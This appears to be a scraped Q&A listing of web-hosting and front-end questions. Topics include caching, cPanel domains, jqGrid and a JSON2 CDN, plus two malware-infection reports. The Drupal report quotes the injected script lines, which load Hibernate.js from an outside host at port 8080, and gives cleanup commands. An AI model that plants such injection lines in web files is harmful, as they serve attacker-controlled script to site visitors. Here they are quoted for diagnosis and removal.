    Software configuration: I have a new server with Windows Server 2008 R2 installed via VMware. I have installed Apache 2.2, PHP 5.2 and MySQL 5.5 as separate packages. Issue: on my first installation, my application worked great. Then I updated some JS and CSS files, and when I access the application again from a PC on the local network, I get the old JS and CSS versions! But when I access the same application on the local server itself, I get the latest versions of those files! The link to my application on the local server is http://localhost/BADIL; the link from the local network is http://LOCAL_SERVER_IP/BADIL. I have never had this kind of issue! I think there is some cache involved, but I don't know where - maybe in Windows Server 2008 R2 or in VMware! The question is: why does everything work fine when I access the application on the server, while from the local network I get the old versions of the JS and CSS files? Can anyone help me, please? Regards.
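
    To rule out a cache between the LAN clients and Apache (a sketch using mod_headers, which ships with Apache 2.2; remove it once the culprit is found), force revalidation of the static files:

        # temporary, in httpd.conf or the site's .htaccess
        <FilesMatch "\.(js|css)$">
            Header set Cache-Control "no-cache, must-revalidate"
        </FilesMatch>

    If the stale files persist even with this header (and after a hard refresh with Ctrl+F5), the old copies are being served before Apache ever sees the request - a browser cache or a proxy on the network; if they update, the previous headers were simply allowing clients to keep the files.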

    Read the article

  • Cookieless Domain redirect in WHM/cPANEL

    - by Patrick Lanfranco
    I am currently trying to get my head around how to set up a "cookieless" domain using WHM/cPanel - unfortunately without any success so far. I have a Magento store, and I would like to use cookieless domains for my media, skin (template) and js files. Magento has a nice feature to define the URLs for those folders. My current setup is as follows:

        www.mydomain.com    <- main store
        media.mydomain.com  <- subdomain pointing to the media folder (mydomain.com/media/)
        skin.mydomain.com   <- subdomain pointing to the skin folder (mydomain.com/skin/)
        js.mydomain.com     <- subdomain pointing to the js folder (mydomain.com/js/)

    I think it's pointless to use these as cookieless domains, since my Magento installation uses .mydomain.com as the cookie domain, so what I would like to achieve is to register an additional domain and have it point, via WHM/cPanel, to those specific locations. I have tried changing the A and CNAME records, although without any success, as they simply redirected from one page to the other in the browser (newdomain.com jumps to old.com). What kind of records do I have to set to get this working properly? Some advice would be highly appreciated.

    Read the article

  • Has my site been attacked?

    - by fretje
    This is about an online store based on Drupal 5. All of a sudden it stopped working. Upon accessing the site, this error came up:

        Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38

    Upon further inspection, I found the following two lines at the end of said index.php:

        <script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
        <!--7379ba6e55616ea66ac9d812fc0597ba-->

    After manually removing those two lines, the site seems to work fine again. But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected": they all contain an extra line at the end:

        document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');

    Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up; that site itself seems legitimate. It's probably hacked itself? Can anybody explain how this could have happened? What can I do to reverse it? And what can I do to avoid this in the future?
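
    For the cleanup itself: since the payload is one appended line per file, something along these lines finds and strips it (a sketch - take a full backup first, and review the matches before the in-place edit):

        # list everything that references the injected host
        grep -rl 'blog.nodisposable.com' /home/public_html
        # remove the injected lines from the .js files
        find /home/public_html -name '*.js' -exec sed -i '/nodisposable\.com/d' {} +

    Injections of this shape are very often planted with stolen FTP credentials rather than through the CMS itself, so changing all FTP/hosting passwords from a known-clean machine is a sensible companion step.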

    Read the article

  • DirectAdmin CentOS 4 server has a virus

    - by Rogier21
    Hello all, I have a problem with a web server running CentOS 4 with DirectAdmin. For a few weeks, some websites hosted on it have not been redirecting properly from search engines; visitors are redirected to some malware site, resulting in a ban from Google. Now I have used three virus scanners:

        ClamAV: didn't find anything
        BitDefender: found 2-3 files with a JS infection, deleted them
        AVG: finds lots of files, but doesn't have an option to clean!

    The viruses it finds are JS/Redir and JS/Dropper. The strange thing is: website A (www.aa.com) has no infected files (I have gone through all the files manually; it's a custom PHP app, nothing special) but still shows the same symptoms. Website B (www.bb.com) was the only one with infected files. I deleted all those files and suspended the account, but no luck: still the same behaviour. I do see log entries from the search engines on the websites, so the DNS entries have not been changed. I have also gone through the httpd files but cannot find anything. Where can I start looking for this?
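
    Redirects that fire only for search-engine visitors are usually implemented as RewriteCond rules keyed on the referer (or user agent), dropped into .htaccess files - which virus scanners typically ignore. A sketch for hunting them down:

        # .htaccess files carrying referer/user-agent conditions
        find /home -name .htaccess -exec grep -l 'HTTP_REFERER\|HTTP_USER_AGENT' {} +
        # PHP files changed recently are the other usual hiding place
        find /home -name '*.php' -mtime -30 -ls

    Checking those is more likely to turn up the redirect logic than another signature scan.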

    Read the article

  • How to reload jqGrid in ASP.NET MVC when a dropdownlist changes

    - by sandeep
    What is wrong with this code? When I change the drop-down list, the grid keeps only the old value of the DDL and doesn't take the newly selected values. Why?

    <%--
    <asp:Content ID="Content2script" ContentPlaceHolderID="HeadScript" runat="server">
        <script type="text/javascript">
            $(function() {
                $("#StateId").change(function() { $('#TheForm').submit(); });
            });
            $(function() {
                $("#CityId").change(function() { $('#TheForm').submit(); });
            });
            $(function() {
                $("#HospitalName").change(function() { $('#TheForm').submit(); });
            });
        </script>
    </asp:Content>
    --%>
    <asp:Content ID="Content3" ContentPlaceHolderID="HeadContent" runat="server">
        <link rel="stylesheet" type="text/css" href="/scripts/themes/coffee/grid.css" title="coffee" media="screen" />
        <script src="/Scripts/jquery-1.3.2.js" type="text/javascript"></script>
        <script src="/Scripts/jquery.jqGrid.js" type="text/javascript"></script>
        <script src="/Scripts/js/jqModal.js" type="text/javascript"></script>
        <script src="/Scripts/js/jqDnR.js" type="text/javascript"></script>
        <script type="text/javascript">
            var gridimgpath = '/scripts/themes/coffee/images';
            var gridDataUrl = '/Claim/DynamicGridData/';
            jQuery(document).ready(function() {
                // $("#btnSearch").click(function() {
                var StateId = document.getElementById('StateId').value;
                var CityId = document.getElementById('CityId').value;
                var HName = document.getElementById('HospitalName').value;
                // alert(CityId); alert(StateId); alert(HName);
                if (StateId > 0 && CityId == '' && HName == '') {
                    CityId = 0;
                    HName = 'Default'.toString();
                    // alert("elseif0" + HName.toString());
                } else if (CityId > 0 && StateId == '') {
                    // alert("elseif1");
                    alert("Please Select State..")
                } else if (CityId > 0 && StateId > 0 && HName == '') {
                    // alert("elseif2");
                    alert(CityId);
                    alert(StateId);
                    HName = "Default";
                } else {
                    // alert("else");
                    StateId = 0;
                    CityId = 0;
                    HName = "Default";
                }
                jQuery("#list").jqGrid({
                    url: gridDataUrl + '?StateId=' + StateId + '&CityId=' + CityId + '&hospname=' + HName,
                    datatype: 'json',
                    mtype: 'GET',
                    colNames: ['Id', 'HospitalName', 'Address', 'City', 'District', 'FaxNumber', 'PhoneNumber'],
                    colModel: [
                        { name: 'HospitalId', index: 'HospitalId', width: 40, align: 'left' },
                        { name: 'HospitalName', index: 'HospitalName', width: 40, align: 'left' },
                        { name: 'Address1', Address: 'Address1', width: 300 },
                        { name: 'CityName', index: 'CityName', width: 100 },
                        { name: 'DistName', index: 'DistName', width: 100 },
                        { name: 'FaxNo', index: 'FaxNo', width: 100 },
                        { name: 'ContactNo1', index: 'PhoneNumber', width: 100 }
                    ],
                    pager: jQuery('#pager'),
                    rowNum: 10,
                    rowList: [5, 10, 20, 50],
                    // sortname: 'Id,',
                    sortname: '1',
                    sortorder: "asc",
                    viewrecords: true,
                    //multiselect: true,
                    //multikey: "ctrlKey",
                    // imgpath: '/scripts/themes/coffee/images',
                    imgpath: gridimgpath,
                    caption: 'Hospital Search',
                    width: 700,
                    height: 250
                });
                $(function() {
                    // $("#btnSearch").click(function() {
                    $('#CityId').change(function() {
                        alert("kjasd");
                        // Set the vars whenever the date range changes and then filter the results
                        StateId = document.getElementById('StateId').value;
                        CityId = document.getElementById('CityId').value;
                        HName = 'default';
                        setGridUrl();
                    });
                    // Set the date range textbox values
                    $('#StateId').val(StateId.toString());
                    $('#CityId').val(CityId.toString());
                    // Set the grid json url to get the data to display
                    setGridUrl();
                });
                function setGridUrl() {
                    alert(StateId);
                    alert(CityId);
                    alert("hi");
                    var newGridDataUrl = gridDataUrl + '?StateId=' + StateId + '&CityId=' + CityId + '&hospname=' + HName;
                    jQuery('#list').jqGrid('setGridParam', {
                        url: newGridDataUrl
                    }).trigger("reloadGrid");
                }
                // });
            });
        </script>
    </asp:Content>
    <asp:Content ID="Content2" ContentPlaceHolderID="MainContent" runat="server">
        <%--<%using (Html.BeginForm("HospitalSearch", "Claim", FormMethod.Post, new { id = "TheForm" })) --%>
        <table cellspacing="0" cellpadding="2" width="100%" border="0">
            <tr>
                <td class="Heading1">Hospital Search</td>
                <td class="Heading1" align="right" width="50%" background="../images/homebg.gif">&nbsp;</td>
            </tr>
            <tr>
                <td colspan="2"><% Html.RenderPartial("InsuredDetails"); %></td>
            </tr>
            <tr>
                <td colspan="2">
                    <table width="100%">
                        <tr>
                            <td class="subline" valign="middle">
                                State : <% =Html.DropDownList("StateId", (SelectList)ViewData["States"], "--Select--", new { @class = "ddownmenu" })%> &nbsp;
                                City : <% =Html.DropDownList("CityId", (SelectList)ViewData["Cities"], "--Select--", new { @class = "ddownmenu" })%> &nbsp;
                                Hospital Name : <% =Html.TextBox("HospitalName")%> &nbsp; &nbsp;
                                <input id="btnSearch" type="submit" value="Search" />
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr>
                <td align="center" colspan="2">&nbsp;</td>
            </tr>
        </table>
        <div id="jqGridContainer">
            <table id="list" class="scroll" cellpadding="0" cellspacing="0"></table>
            <div id="pager" class="scroll" style="text-align:center;"></div>
        </div>
    </asp:Content>

    Read the article

  • Is there a publicly available CDN that hosts JSON2?

    - by Xavi
    It's well known that Google and Microsoft host several common JavaScript libraries on their CDNs (content distribution networks). Unfortunately, neither seems to host JSON2.js. I'm aware that I could upload a copy of JSON2.js to my server and serve it myself, but there are a number of advantages CDNs offer that I would like to take advantage of. So with that in mind, are there any publicly available CDNs that host JSON2? If not, any idea why?
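
    A likely part of the "why": every modern browser implements the native ES5 JSON object, so json2.js is only needed as a polyfill for old browsers. A common middle ground is to skip the request entirely where the native object exists and fall back to a self-hosted copy otherwise (a sketch; the local path is an assumption):

        <script>
            // window.JSON is defined natively in ES5-era browsers
            window.JSON || document.write('<script src="/js/json2.min.js"><\/script>');
        </script>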

    Read the article
